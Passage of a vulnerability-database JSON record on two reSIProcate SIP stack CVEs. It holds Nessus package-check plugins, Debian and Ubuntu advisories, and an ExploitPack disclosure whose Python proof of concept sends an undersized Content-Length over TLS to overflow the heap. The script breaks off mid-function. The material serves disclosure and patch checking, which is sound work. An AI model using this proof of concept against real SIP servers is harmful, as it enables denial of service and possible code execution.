resip/stack/ConnectionBase.cxx in reSIProcate through 1.10.2 allows remote attackers to cause a denial of service (buffer overflow) or possibly execute arbitrary code when TLS communication is enabled. (CVE-2018-12584)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-29T00:00:00", "type": "nessus", "title": "Debian DLA-2865-1 : resiprocate - LTS security update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11521", "CVE-2018-12584"], "modified": "2022-01-20T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:librecon-1.11", "p-cpe:/a:debian:debian_linux:librecon-1.11-dev", "p-cpe:/a:debian:debian_linux:libresiprocate-1.11", "p-cpe:/a:debian:debian_linux:libresiprocate-1.11-dev", "p-cpe:/a:debian:debian_linux:libresiprocate-turn-client-1.11", "p-cpe:/a:debian:debian_linux:libresiprocate-turn-client-1.11-dev", "p-cpe:/a:debian:debian_linux:repro", "p-cpe:/a:debian:debian_linux:resiprocate-turn-server", "p-cpe:/a:debian:debian_linux:resiprocate-turn-server-psql", "p-cpe:/a:debian:debian_linux:sipdialer", "p-cpe:/a:debian:debian_linux:telepathy-resiprocate", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2865.NASL", "href": "https://www.tenable.com/plugins/nessus/156386", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dla-2865. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156386);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2017-11521\", \"CVE-2018-12584\");\n\n script_name(english:\"Debian DLA-2865-1 : resiprocate - LTS security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the\ndla-2865 advisory.\n\n - The SdpContents::Session::Medium::parse function in resip/stack/SdpContents.cxx in reSIProcate 1.10.2\n allows remote attackers to cause a denial of service (memory consumption) by triggering many media\n connections. (CVE-2017-11521)\n\n - The ConnectionBase::preparseNewBytes function in resip/stack/ConnectionBase.cxx in reSIProcate through\n 1.10.2 allows remote attackers to cause a denial of service (buffer overflow) or possibly execute\n arbitrary code when TLS communication is enabled. (CVE-2018-12584)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=869404\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/resiprocate\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/lts/security/2021/dla-2865\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2017-11521\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2018-12584\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/stretch/resiprocate\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the resiprocate packages.\n\nFor Debian 9 stretch, these problems have been fixed in version 1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-12584\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:librecon-1.11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:librecon-1.11-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libresiprocate-1.11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libresiprocate-1.11-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libresiprocate-turn-client-1.11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libresiprocate-turn-client-1.11-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:repro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:resiprocate-turn-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:resiprocate-turn-server-psql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:sipdialer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:telepathy-resiprocate\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar release = get_kb_item('Host/Debian/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Debian');\nvar release = chomp(release);\nif (! preg(pattern:\"^(9)\\.[0-9]+\", string:release)) audit(AUDIT_OS_NOT, 'Debian 9.0', 'Debian ' + release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '9.0', 'prefix': 'librecon-1.11', 'reference': '1:1.11.0~beta1-3+deb9u2'},\n {'release': '9.0', 'prefix': 'librecon-1.11-dev', 'reference': '1:1.11.0~beta1-3+deb9u2'},\n {'release': '9.0', 'prefix': 'libresiprocate-1.11', 'reference': '1:1.11.0~beta1-3+deb9u2'},\n {'release': '9.0', 'prefix': 'libresiprocate-1.11-dev', 'reference': '1:1.11.0~beta1-3+deb9u2'},\n {'release': '9.0', 'prefix': 'libresiprocate-turn-client-1.11', 'reference': '1:1.11.0~beta1-3+deb9u2'},\n {'release': '9.0', 'prefix': 'libresiprocate-turn-client-1.11-dev', 'reference': '1:1.11.0~beta1-3+deb9u2'},\n {'release': '9.0', 'prefix': 'repro', 'reference': '1:1.11.0~beta1-3+deb9u2'},\n {'release': '9.0', 'prefix': 'resiprocate-turn-server', 'reference': '1:1.11.0~beta1-3+deb9u2'},\n {'release': '9.0', 'prefix': 'resiprocate-turn-server-psql', 'reference': '1:1.11.0~beta1-3+deb9u2'},\n {'release': '9.0', 'prefix': 'sipdialer', 'reference': '1:1.11.0~beta1-3+deb9u2'},\n {'release': '9.0', 'prefix': 'telepathy-resiprocate', 'reference': '1:1.11.0~beta1-3+deb9u2'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (release && prefix && reference) {\n if (deb_check(release:release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'librecon-1.11 / librecon-1.11-dev / libresiprocate-1.11 / etc');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:47:35", "description": "CVE-2018-12584 A flaw in function ConnectionBase::preparseNewBytes of resip/stack/ConnectionBase.cxx has been detected, that allows remote attackers to cause a denial of service (buffer overflow) or possibly execute arbitrary code when TLS communication is enabled.\n\nCVE-2017-11521 A flaw in function SdpContents::Session::Medium::parse of resip/stack/SdpContents.cxx has been detected, that allows remote attackers to cause a denial of service (memory consumption) by triggering many media connections.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 1:1.9.7-5+deb8u1.\n\nWe recommend that you upgrade your resiprocate packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-07-25T00:00:00", "type": "nessus", "title": "Debian DLA-1439-1 : resiprocate security update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11521", "CVE-2018-12584"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:librecon-1.9", "p-cpe:/a:debian:debian_linux:librecon-1.9-dev", "p-cpe:/a:debian:debian_linux:libresiprocate-1.9", "p-cpe:/a:debian:debian_linux:libresiprocate-1.9-dev", "p-cpe:/a:debian:debian_linux:libresiprocate-turn-client-1.9", "p-cpe:/a:debian:debian_linux:libresiprocate-turn-client-1.9-dev", "p-cpe:/a:debian:debian_linux:repro", "p-cpe:/a:debian:debian_linux:resiprocate-turn-server", "p-cpe:/a:debian:debian_linux:sipdialer", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-1439.NASL", "href": "https://www.tenable.com/plugins/nessus/111311", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1439-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111311);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-11521\", \"CVE-2018-12584\");\n\n script_name(english:\"Debian DLA-1439-1 : resiprocate security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2018-12584 A flaw in function ConnectionBase::preparseNewBytes of\nresip/stack/ConnectionBase.cxx has been detected, that allows remote\nattackers to cause a denial of service (buffer overflow) or possibly\nexecute arbitrary code when TLS communication is enabled.\n\nCVE-2017-11521 A flaw in function SdpContents::Session::Medium::parse\nof resip/stack/SdpContents.cxx has been detected, that allows remote\nattackers to cause a denial of service (memory consumption) by\ntriggering many media connections.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1:1.9.7-5+deb8u1.\n\nWe recommend that you upgrade your resiprocate packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/07/msg00031.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/resiprocate\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:librecon-1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:librecon-1.9-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libresiprocate-1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libresiprocate-1.9-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libresiprocate-turn-client-1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libresiprocate-turn-client-1.9-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:repro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:resiprocate-turn-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:sipdialer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"librecon-1.9\", reference:\"1:1.9.7-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"librecon-1.9-dev\", reference:\"1:1.9.7-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libresiprocate-1.9\", reference:\"1:1.9.7-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libresiprocate-1.9-dev\", reference:\"1:1.9.7-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libresiprocate-turn-client-1.9\", reference:\"1:1.9.7-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libresiprocate-turn-client-1.9-dev\", reference:\"1:1.9.7-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"repro\", reference:\"1:1.9.7-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"resiprocate-turn-server\", reference:\"1:1.9.7-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sipdialer\", reference:\"1:1.9.7-5+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-01-27T14:25:16", "description": "The SdpContents::Session::Medium::parse function in\nresip/stack/SdpContents.cxx in reSIProcate 1.10.2 allows remote attackers\nto cause a denial of service (memory consumption) by triggering many media\nconnections.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=869404>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-07-22T00:00:00", "type": "ubuntucve", "title": "CVE-2017-11521", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11521"], "modified": "2017-07-22T00:00:00", "id": "UB:CVE-2017-11521", "href": "https://ubuntu.com/security/CVE-2017-11521", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2022-04-21T22:07:31", "description": "Package : resiprocate\nVersion : 1:1.9.7-5+deb8u1\nCVE ID : CVE-2017-11521 CVE-2018-12584\n\n\nCVE-2018-12584\n A flaw in function ConnectionBase::preparseNewBytes of\n resip/stack/ConnectionBase.cxx has been detected, that\n allows remote attackers to cause a denial of service\n (buffer overflow) or possibly execute arbitrary code\n when TLS communication is enabled.\n\nCVE-2017-11521\n A flaw in function SdpContents::Session::Medium::parse of\n resip/stack/SdpContents.cxx has been detected, that allows\n remote attackers to cause a denial of service (memory\n consumption) by triggering many media connections.\n\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n1:1.9.7-5+deb8u1.\n\nWe recommend that you upgrade your resiprocate packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-07-24T20:13:30", "type": "debian", "title": "[SECURITY] [DLA 1439-1] resiprocate security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11521", "CVE-2018-12584"], "modified": "2018-07-24T20:13:30", "id": "DEBIAN:DLA-1439-1:BD082", "href": "https://lists.debian.org/debian-lts-announce/2018/07/msg00031.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-23T20:06:34", "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2865-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Adrian Bunk\nDecember 29, 2021 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : resiprocate\nVersion : 1:1.11.0~beta1-3+deb9u2\nCVE ID : CVE-2017-11521 CVE-2018-12584\nDebian Bug : 869404 905495\n\nTwo vulnerabilities were fixed in the reSIProcate SIP stack.\n\nCVE-2017-11521\n\n The SdpContents::Session::Medium::parse function allowed remote \n attackers to cause a denial of service.\n\nCVE-2018-12584\n\n The ConnectionBase::preparseNewBytes function allowed remote \n attackers to cause a denial of service or possibly execute arbitrary \n code when TLS communication is enabled.\n\nFor Debian 9 stretch, these problems have been fixed in version\n1:1.11.0~beta1-3+deb9u2.\n\nWe recommend that you upgrade your resiprocate packages.\n\nFor the detailed security status of resiprocate please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/resiprocate\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-29T13:57:44", "type": "debian", "title": "[SECURITY] [DLA 2865-1] resiprocate security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11521", "CVE-2018-12584"], "modified": "2021-12-29T13:57:44", "id": "DEBIAN:DLA-2865-1:E2370", "href": "https://lists.debian.org/debian-lts-announce/2021/12/msg00029.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:06:07", "description": "\nreSIProcate 1.10.2 - Heap Overflow", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-09T00:00:00", "title": "reSIProcate 1.10.2 - Heap Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11521", "CVE-2018-12584"], "modified": "2018-08-09T00:00:00", "id": "EXPLOITPACK:D90E8A68ABB9C128F09E9C1AA57B32CC", "href": "", "sourceData": "'''\nCVE ID: CVE-2018-12584\n\nTIMELINE\n\n Bug report with test code sent to main reSIProcate developers: 2018-06-15\n Patch created by Scott Godin: 2018-06-18\n CVE ID assigned: 2018-06-19\n Patch committed to reSIProcate repository: 2018-06-21\n Advisory first published on website: 2018-06-22\n Advisory sent to Bugtraq mailing list: 2018-08-08\n\nDESCRIPTION\n\nA heap overflow can be triggered in the reSIProcate SIP stack when TLS is\nenabled.\nAbuse of this vulnerability may cause a denial of service of software using\nreSIProcate and may also lead to remote code execution.\nNo SIP user authentication is required to trigger the vulnerability on the\nclient or server side.\n\nTECHNICAL DETAILS\n\nThe file resiprocate/resip/stack/ConnectionBase.cxx contained the following\ncode fragment:\n\nbool\nConnectionBase::preparseNewBytes(int bytesRead)\n{\n/* ... */\n else if (mBufferPos == mBufferSize)\n {\n // .bwc. We've filled our buffer; go ahead and make more room.\n size_t newSize = resipMin(mBufferSize*3/2, contentLength);\n char* newBuffer = 0;\n try\n {\n newBuffer=new char[newSize];\n }\n catch(std::bad_alloc&)\n {\n ErrLog(>>\"Failed to alloc a buffer while receiving body!\");\n return false;\n }\n memcpy(newBuffer, mBuffer, mBufferSize);\n mBufferSize=newSize;\n delete [] mBuffer;\n mBuffer = newBuffer;\n }\n/* ... */\n}\n\nExecution of the code above could be triggered by sending a partial SIP\nmessage over TLS with a Content-Length header field, followed by sending a\npacket over TLS with its associated SIP message body. By setting the\nContent-Length field to a value that is lower than the length of the SIP\nmessage body which followed, a malicious user could trigger a heap buffer\noverflow.\n\nThe bug did not appear to be reproducible using TCP instead of TLS even when\nthe TCP packets were sent with delays between them.\n\nTEST CODE\n\nThe following Python script can be used to test the vulnerability of both\nserver and client software based on reSIProcate.\n'''\n\n#!/usr/bin/python3\n\n# reSIProcate through 1.10.2 SIP over TLS heap overflow bug test code\n# Written by Joachim De Zutter (2018)\n\nfrom socket import *\nfrom ssl import * # pip install pyopenssl\n\ndaemon_mode = False\n\n# server to test (in case daemon_mode = False)\nserver = \"\"\nport = 5061\n\n# server configuration (in case daemon_mode = True)\nserver_ip = \"xxx.xxx.xxx.xxx\"\nkeyfile = \"keyfile.pem\"\ncertfile = \"certfile.pem\"\n\nusername = \"test\"\nvia = \"192.168.13.37:31337\"\ncallid = \"LtCwMvc2C5tca58a5Ridwg..\"\ncseq = 1\n\ndef trigger_server_heap_overflow(connection):\n global username, server, via, cseq\n print(\"Triggering heap overflow!\")\n buffer_length = 100\n register_packet = \"REGISTER sip:\" + server + \" SIP/2.0\\x0d\\x0aVia:\nSIP/2.0/TCP \" + via + \"\\x0d\\x0aContact: <sip:\" + username + \"@\" + via\n+ \">\\x0d\\x0aTo: <sip:\" + username + \"@\" + server +\n\";transport=TCP>\\x0d\\x0aFrom: <sip:\" + username + \"@\" + server +\n\">\\x0d\\x0aCSeq: \" + \"%d\" % cseq + \" REGISTER\\x0d\\x0aExpires:\n600\\x0d\\x0aContent-Length: %ld\" % buffer_length + \"\\x0d\\x0a\\x0d\\x0a\"\n oversized_packet = buffer_length * \"A\" + 64 * \"B\"\n connection.send(register_packet.encode())\n cseq = cseq + 1\n connection.send(oversized_packet.encode())\n\ndef trigger_client_heap_overflow(connection):\n global username, via, callid, cseq\n print(\"Triggering heap overflow!\")\n buffer_length = 100\n content_length_packet = 